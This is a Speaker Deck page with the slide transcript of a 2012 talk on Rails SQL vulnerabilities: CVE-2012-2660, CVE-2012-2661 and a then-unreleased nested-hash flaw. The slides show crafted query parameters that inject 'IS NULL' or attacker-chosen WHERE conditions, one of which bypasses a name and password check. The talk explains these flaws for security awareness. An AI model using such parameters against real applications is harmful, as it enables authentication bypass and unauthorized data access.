Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Justin Collins
April 23, 2015
Programming
0
54
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
110
The Evolution of Rails Security
presidentbeef
1
650
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
98
Practical Static Analysis for Continuous Application Security
presidentbeef
0
150
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
320
Continuous Security with Practical Static Analysis
presidentbeef
1
250
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
160
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.1k
Tales from the Crypt
presidentbeef
1
160
Other Decks in Programming
See All in Programming
Go1.22からの疑似乱数生成器について/go-122-pseudo-random-generator
convto
1
160
15分間でふんわり理解するDocker @ Matsuriba MAX
ukwhatn
PRO
1
340
Laravel OpenAPIによる"辛くない"スキーマ駆動開発
kentaroutakeda
2
2.1k
マイ隙間家具OSSたちのご紹介
karupanerura
2
150
決断するための勇気、そのためのBacklog / Courage to make decisions, Backlog for that.
seike460
PRO
4
1.9k
GitHub Copilot Tips and Tricks
yuichielectric
26
7.4k
【KMC春合宿2024】実装視点で見るNeural Radiance Fields
runningoutrate
0
150
Migrating to Signals: A Practical Workshop
manfredsteyer
PRO
0
280
DDDはなぜ難しいのか / 良いコードの定義と設計能力の壁
pospome
24
7.3k
Deep Dive 大規模システムアーキテクチャ/開発組織エンジニアリング / Deep Dive Large-Scale System Architecture, Development Organization Engineering
nrslib
15
2.9k
Prepare for Jakarta EE 11 - Performance and Developer Productivity
ivargrimstad
0
490
Some Quick Ideas To Improve Your Tests ( #jassttokyo )
teyamagu
PRO
2
2.3k
Featured
See All Featured
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
28
5.9k
A Tale of Four Properties
chriscoyier
150
22k
Bootstrapping a Software Product
garrettdimon
PRO
302
110k
Building Adaptive Systems
keathley
29
1.8k
GitHub's CSS Performance
jonrohan
1023
450k
The Power of CSS Pseudo Elements
geoffreycrofte
58
4.9k
Web development in the modern age
philhawksworth
201
10k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
153
14k
Raft: Consensus for Rubyists
vanstee
130
6.2k
A Modern Web Designer's Workflow
chriscoyier
689
190k
No one is an island. Learnings from fostering a developers community.
thoeni
14
2k
From Idea to $5000 a Month in 5 Months
shpigford
376
45k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1